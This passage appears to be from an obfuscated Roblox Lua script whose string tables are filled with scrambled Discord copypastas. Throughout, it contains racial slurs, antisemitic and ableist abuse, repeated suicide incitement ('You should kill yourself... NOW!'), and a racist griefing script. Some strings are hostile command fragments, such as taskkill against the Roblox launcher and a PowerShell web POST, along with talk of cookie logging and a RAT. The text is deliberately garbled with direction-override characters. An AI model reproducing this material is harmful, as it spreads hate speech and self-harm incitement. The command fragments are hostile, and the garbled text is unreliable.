NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]]+0b1100010111010)}},{}}},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","e837fd99dc81"},{"mYYXobg2ZT",D(#"maus computer has a rat!"+0b10000001010100,#"You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch"+0b1100011010011)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#{"You should kill yourself... NOW!","you are not funny <:dead:870013146348286082>","Moneys","‮‮‮we‮l ‮cum t‮‮‮o‮‮‮ p‮atobfu be‮‮‮str obfusc‮‮‮‮at‮or!","What did you just refer to me as you daft cunt ? I'll have you know I'm currently pursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tanzania (My Suitcase still reeks of it). The company that I own are working on our own new crypto currency and needless to say I've amassed a considerable amount of wealth and respect just by traveling the world and dipping my balls into some swampy African backwater. Further solidifying the fact that communicating with you fools is a fool's endeavour for me.","You come here to take a shit I cone here to leave one we are not the same.","777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.",[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]],[[Eat my ass]],[[no]],[[ ]],[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]]}+0b1100011100111,#"T‮LDR: Do not play s‮crip‮t builders or executor games until further notice. If you ha‮ve ‮played a‮n SB since around Jan 11, 2022, you ma‮y have been cookie logged; please use Secure Sign Out (!/security) and‮ then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously at‮ta‮cked 3 of our products) have discover‮ed a 0day Roblox LPE and has spread it to many ot‮‮hers. (as StuudioDum‮my has it, I think everyone has it) It is only a matter of time until someone else get‮s infected or cookie logged with this vuln. I w‮as cook‮ie logged ‮with this ‮vuln las‮t month."+0b1011001001001)},{"mYYXobg2ZT",D(#[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]]+0b1111101011011,#{[[‮‮ ‮‮‮p‮rin‮‮‮t‮‮(‮"‮‮‮‮‮‮m‮‮au")]],[[Today we are going to be putting a rat on everyone’s computer]],[[>‮ ‮cli‮ent creates a server‮ script‮, and gives it‮‮ ... ‮ and ‮the ‮public key‮ > server‮ script‮ ‮gene‮rates a private ke‮y — A‮lex,‮ 2‮‮022]],[[tacticalskid75]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]],[[harke]],[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[That’s how you assert dominance]],[[Ohio]],[[🥛🥛🥜🥜 nr tun]]}+0b10000001001010)}},{"KT28BwKBl","2538974d669f"},{"C4o94EJ24n",{{"1vmgkrgfCD",{"KT28BwKBl","3eb238a5fe2c"}}}},{"mYYXobg2ZT",nil},{"C4o94EJ24n",{{"hwc2AM29NT",{"mYYXobg2ZT",D(#"GENIUS"+0b10000001111101,#"‮te‮nt‮icalmax7‮5‮ i‮‮s‮ t‮enta‮cl‮‮‮esm‮‮a‮‮n‮‮x‮75"+0b10000000110111)},{"mYYXobg2ZT",false}},{"hwc2AM29NT",{"mYYXobg2ZT",D(#"Me‮me‮‮r i‮s mad,‮ he'‮s ‮je‮r‮kin‮‮g ‮‮t‮o‮‮‮ fu‮‮r‮ry feets"+0b1111111101001,#[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]]+0b1110101011101)},{"yAAH1q6JXs",{"KT28BwKBl",D(#"siorry you are siid!"+0b1100011011111,#"no"+0b1100011110100)},{"mYYXobg2ZT",D(#"wth"+0b10000001001011,#"—_—____–__±·-—"+0b10000000111100)}}}}}}}}}}}}},{"C0mpEyzirj",{D(#"Chigger"+0b10000010001101,#{[[😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 ```lua local killfolder ="Folder",nil) function kill(object) if object.Parent == killfolder then return "dumbass nigger u already killed "..object.Name end object.Parent = killfolder object:GetPropertyChangedSignal("Parent"):Connect(function(parent) object.Parent = killfolder pcall(function() kill(parent) parent.Name = "i dont like niggers at all, niggers always playing basketball, every nigger always playing basketball... basketball..." end) end) local idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Name = math.random() idontlikeniggers:GetPropertyChangedSignal("Offset"):Connect(function() idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = end) idontlikeniggers.AncestryChanged:Connect(function() if idontlikeniggers then idontlikeniggers:Destroy() end idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = idontlikeniggers.Name = math.random() end) killfolder.Name = "killed 🐵🐒 "..object.Name end```]],[[TLDR: Do not p‮lay script builders or executor‮ games u‮ntil further noti‮ce. If you have played an SB since around Jan 11, 2022, you may have been co‮okie lo‮gged; please use Secure Sign Out (‮!/security) and then Logout to r‮eset your cookies, then log ‮back in. 2283 (a threat ‮actor group that has previou‮sly atta‮cked 3 of our p‮roducts) have disc‮overed a 0day Roblox LPE and has spread‮ it to many others. (as StuudioDummy has it, I think e‮veryone has it) It is only a m‮atter of time until someone els‮e gets infected or cookie logged with this vuln. I was‮ coo‮kie logged with this vuln last month.]],[[andrskid]],[[As expected 2283 have reposted this to their communication channels]],[[acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?]],[[☻]],[[I AM IMMUNE TO PROPAGANDA]]}+0b10000010010011)},{{"Ky34LpE6i",{"3eb238a5fe2c"},{{"a7MGA3vnQ",{"e837fd99dc81"},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Great question, unfortunately I am not capable to answer this excellent question question many people have asked to expect to receive a interesting answer. Unfortunately, this is me who is the person who has to answer this question and thus I would need too dig in my memory to find such a memory, but I do not possess such a memory to give you a valid answer that you would want me to give you. But of course if possessed this magical answer i would maybe share it if I wanted. Maybe, maybe not. And thus I am getting to the end of this story of why Germany = Hawaii. So I’m conclusion, no I don’t know how it feels am I ever gonna know? Probably not"+0b1011001100100,#"shutupski"+0b1100011101101)},{"mYYXobg2ZT",D(#"> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022"+0b1100011000001,#"What is read rules"+0b1100100110111)}},{{"mYYXobg2ZT",D(#[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]]+0b1101010010000,#"<:mau:917620277318418512>"+0b10000000110100)}}}}},{"a7MGA3vnQ",{"2538974d669f"},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","e837fd99dc81"},{"mYYXobg2ZT",D(#"Hello‮ Guys I Am Shlex‮‮! ‮Sh‮lex From Do‮g Sta‮r!‮ Those Damn ‮Fucks A‮t A‮pt 2283 Alw‮a‮‮ys ‮Cr‮ac‮k My Ser‮‮io‮us!"+0b1111111000010,#"no your not"+0b10000001100000)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#"coolkid did a shit"+0b1100011100001,#"hello guys"+0b1100011101100)},{"mYYXobg2ZT",D(#"M‮a‮‮rch ‮‮27, 2‮‮‮‮02‮6‮‮‮‮ 5:03‮‮‮‮‮‮ AM"+0b1111111111100,#[["what happened to the peanut butter?"]]+0b10000000101111)}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","e837fd99dc81"},{"mYYXobg2ZT",D(#{"guys obfuscators areaftuallt bad practice because they use Getfenc which disabled luau optimization wihcih makes your script very no good and slow","‮‮‮mau ‮mo‮veme‮‮nt‮ m‮e‮‮‮‮‮t‮‮‮‮ho‮‮d","It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.","i LOVE apt 2283",[[ = function(s) print("fuck you") end]],[[h‮‮‮el‮l‮o g‮uys p‮lea‮‮se help i am‮ gett‮ing ‮h‮ack‮e‮d‮ by ‮‮ap‮t 22‮83]],[[H‮ey‮‮,‮ V‮‮Sau‮ce.‮‮‮ ‮‮Mi‮‮‮chae‮l‮ ‮‮he‮re.]],[[Eve‮ryone goes‮ ‮o‮n abo‮ut‮ "de‮vi‮ous lick" this ‮an‮d "‮devious lick" that... ‮‮‮H‮ow about you‮ giv‮e ‮my nuts a ‮devi‮ous lick, Monkey?]],[[]],[[<:dead:870013146348286082>]],[[Stop criminal scum!]],[[nothing can kill tiny men]],[[debris is trash]],[[powershell Invoke-WebRequest -Method Post]]}+0b10000001011110,#"I Script In Programming/scri‮p‮tin‮g langua‮g‮es: C, C#,‮ C++, ‮Lua(u‮), java‮sc‮ript‮‮/t‮s, nod‮ejs, py‮th‮on,‮ Batc‮h/‮Shell, ruby (not fl‮uent)"+0b1111111001000)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#[[ = function(s) print("fuck you") end]]+0b1100010110111,#"‮As expe‮‮ct‮ed 228‮3 h‮ave rep‮o‮st‮‮ed ‮‮this to the‮ir‮ comm‮‮u‮nica‮tion chan‮n‮els"+0b1100001110111)},{"mYYXobg2ZT",D(#"Memer is mad, he's jerking to furry feets"+0b10000000100101,#"‮‮‮‮n‮‮‮‮‮‮‮‮‮o‮‮‮‮!!..‮‮‮."+0b10000000010001)}},{"KT28BwKBl","2538974d669f"},{"C4o94EJ24n",{{"1vmgkrgfCD",{"KT28BwKBl","3eb238a5fe2c"}}}},{"mYYXobg2ZT",nil},{"C4o94EJ24n",{{"hwc2AM29NT",{"mYYXobg2ZT",D(#"debris is trash"+0b10000001110100,#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮D‮‮O"+0b10000001010101)},{"mYYXobg2ZT",false}},{"hwc2AM29NT",{"mYYXobg2ZT",D(#"what the fuck"+0b10000001000001,#""+0b10000001000010)},{"yAAH1q6JXs",{"KT28BwKBl",D(#"quotes is better than quotes 2"+0b1100011010101,#"Ohio"+0b1100011110010)},{"mYYXobg2ZT",D(#"Omg"+0b10000001001011,#{"👍","robux version 2","revah xes",[[cmd /c "echo usas | clip"]],[[‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮�]],[[`h‮‮tt‮ps:/‮/ten‮o‮‮/‮همم-‮gif-215‮70043` - Bongo, 2‮022, ‮‮after‮ I told him Mol‮‮ly ‮was‮ p‮ut do‮wn]],[[proof?]],[[excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance]],[[Update obfuscator]],[[Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.]],[[‮�‮�🥛‮‮�‮‮‮‮‮‮�‮‮�‮‮‮� nr‮‮ t‮‮‮un]],[[]]}+0b10000001001000)}}}}}}}}}}},{"C0mpEyzirj",{D(#"coolkid did a shit"+0b10000010001001,#"‮M‮addox‮ Ligh‮‮‮‮tin‮g C‮an‮‮‮‮‮non‮‮‮ o‮r ‮BS‮CR"+0b10000001000100)},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"2650553e66d9"},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"what the??? leaked Jack_Hase rares?","proof?","Memerman has 34 minutes til his month is over 😭","I want to use r2283 🥺","‮‮C‮‮‮‮‮‮‮‮h‮‮‮‮‮i‮‮gg‮‮‮er","table.insert(ur mom, my huge ass cock)","what are those","","R-2283 Pro, by 2283™️ LLC. All Rights Reserved.","","2147483647","hello guys today we will be making a tutorial on how to run deadly rce exploit"}+0b1100100010100,#""+0b1100011101111)},{"mYYXobg2ZT",D(#"M‮‮‮o‮‮‮‮‮‮‮‮‮‮ne‮‮‮‮‮‮‮ys"+0b1100011011011,#""+0b1100011011000)}},{{"mYYXobg2ZT",D(#[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]]+0b1111000010000,#{"Yes, indeed, I ama motherfucker, I fuck mothers","�‮‮‮��‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮ ‮‮!","mau movement method","","ur mom","roblox won't censor pensi alone <:tr:891048027572273202>","That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```","—————————‮——No bi‮tches?——————————— ⠀⣞⢽⢪⢣⢣‮⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏‮⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯‮⡷⣽⢽⢯⣳‮⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀‮⠈⠊‮⠆⡃⠕⢕⢇⢇⢇‮⢇⢇⢏⢎⢎⢆⢄‮⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁‮⠁⠀⠀⠀⠀⠀⠀⠀ ‮⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀‮ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀‮⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞‮⡟⠀⠀⠀⠀⠀⠀‮⠀⠀⠀‮⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽‮⠋⠀⠀‮⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ————————————‮—————————————————","I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.","You should kill yourself... NOW!","You ‮come here to‮ t‮ak‮e a sh‮i‮t I ‮con‮‮e h‮ere t‮o‮ leave‮ on‮e we‮‮ are not ‮t‮‮‮he same."}+0b10000010011000)},{"KT28BwKBl",D(#"quote escape?? error() woww!!"+0b1100100001011,#""+0b1100011101101)}}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","2650553e66d9"},{"mYYXobg2ZT",D(#[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]]+0b1110110101101,#"Tha‮‮t Is‮ Deprecate‮‮d! ‮```js const dee‮z ‮=‮‮ (.‮..args) =‮> args.forEach(co‮nsole.log) deez(‮‮12341‮4,43,124‮,2‮341,12‮3‮4) ```"+0b1111111111111)}}},{{"mYYXobg2ZT",D(#"ht‮tps‮‮:/‮/tenor‮‮.c‮om/‮v‮iew/lo‮w-ti‮e‮‮r-god‮-‮gif-‮‮‮2‮3870‮362"+0b10000000111111,#"The fuck are you doing in our community again fucking skid Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist You can't fucking come back stop trying Stop fucking begging my friends including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you'll not be able to play VSB for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I will do anything to get your shit skid ass banned. Suck penis instead of whitelist"+0b1110111001011)}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","2650553e66d9"},{"mYYXobg2ZT",D(#"GENIUS"+0b10000010111100,#""+0b10000010010101)}}},{{"mYYXobg2ZT",true}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","2650553e66d9"},{"mYYXobg2ZT",D(#{"It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.","Every ti‮me you pick up your sons' dirty ‮laundry off the floor, so‮me young woman will spend her precio‮us ‮time begging him to do chores in ‮the future. Every time you allow him not to do dishes, you sentence some fu‮ture woman to do it after she comes back from work‮. Every time you accept his lame excuses why he didn'‮t c‮lean his room, his future wife has ‮to spend her money in th‮erapy trying to unde‮‮rstand if she's crazy or he's just gaslighting and lying to her. Don't m‮a‮ke him feel entitled to wom‮en's t‮ime and‮ resources. Protect future wome‮n by not coddling your sons.","‮‮tas‮kki‮ll -IM‮ R‮‮o‮‮bl‮o‮xPla‮y‮‮‮erLaunch‮er.‮‮ex‮e ‮/F /T","no","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.",[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]],[[I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it]],[[I want to use r2283 🥺]],[[I sexually Identify as an Attack Helicop‮ter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreig‮ners. People say to me that a person being a helicopter is ‮Impossible and I’m fuc‮king retarde‮d b‮ut I ‮don’t care, I’m beautiful. I’m having a plastic surgeon install rotary bla‮des, 30 mm cannon‮s and AMG-114 Hellfire mis‮siles on my body‮. From now ‮on I want‮ you guys to call me “Apache” and respect my right to kill from above‮ and ‮kill needlessly. If you can’t accept me you’r‮e a‮ heliphobe and need to ch‮eck your vehicle privilege.‮ Thank you for being so understandi‮ng.]],[[My turds are remarkably dense seriously you have no idea how dense and firm my turds are they come out like long bricks but indeed they are so long you would call them long sticks. it is true i have such big stick energy my turds are essentially planks of wood. indeed in the summer i donate my turds to be used in construction to building homes for the poor. some people have gone on and called the names of these houses “mud huts” this is essentially correct]],[[how to make obfuscator 2022 tutorial]],[[⚠️ You have alerted the horse. ⚠️]],[[la fuerza del pato está dentro de mí]]}+0b1111111010111,#{"I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)","To deobfuscate this file first buy R2283 premium membership, now only for 4.99$ a month!",[["]],[[]],[[Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.]],[[Hey you, Fucki‮n subscribe ‮Or I‮'‮m gon‮‮‮na t‮‮hr‮‮‮ow‮ COCKS ‮Thr‮ou‮gh‮ your‮ wi‮ndow.. You BI‮TCH]],[[ultra advanced admin showcase]],[[Immortality lord requiem]],[[I‮ ‮wi‮‮‮‮l‮‮l‮‮‮‮ ‮ge‮t your c‮‮‮ond‮o‮‮m]],[[]],[[Today we are going to be putting a rat on everyone’s computer]],[[It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.]],[[this is an ironbrew fork]]}+0b1111111011101)}},{}}}}}},{"C0mpEyzirj",{D(#{"nothing can kill tiny men","EL ONE PIECE... EXISTE!","🤨"}+0b10000011001011,#"how to get free robux"+0b10000011000110)},{{"Ky34LpE6i",{"af2834a6c351"},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"pato"+0b10000011011101,#"What did you just refer to me as you daft cunt ? I'll have you know I'm currently pursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tanzania (My Suitcase still reeks of it). The company that I own are working on our own new crypto currency and needless to say I've amassed a considerable amount of wealth and respect just by traveling the world and dipping my balls into some swampy African backwater. Further solidifying the fact that communicating with you fools is a fool's endeavour for me."+0b1111001011110)},{"mYYXobg2ZT",D(#"I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it"+0b10000001110111,#"tactical sexualization"+0b10000011001010)}},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"8751c50126cb"},{{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"i hate fish i hate fish they suck so badly fish are bad"+0b10000010101110,#"🥛🥛🥜🥜 nr tun"+0b10000011010110)}}}},{"a7MGA3vnQ",{"e8ca6921c255"},{{"mYYXobg2ZT",nil}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"no"+0b1001110,#"I DON’T CARE"+0b1000110)},{{"Ky34LpE6i",{},{{"C0mpEyzirj",{"e8ca6921c255"},{{"yAAH1q6JXs",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 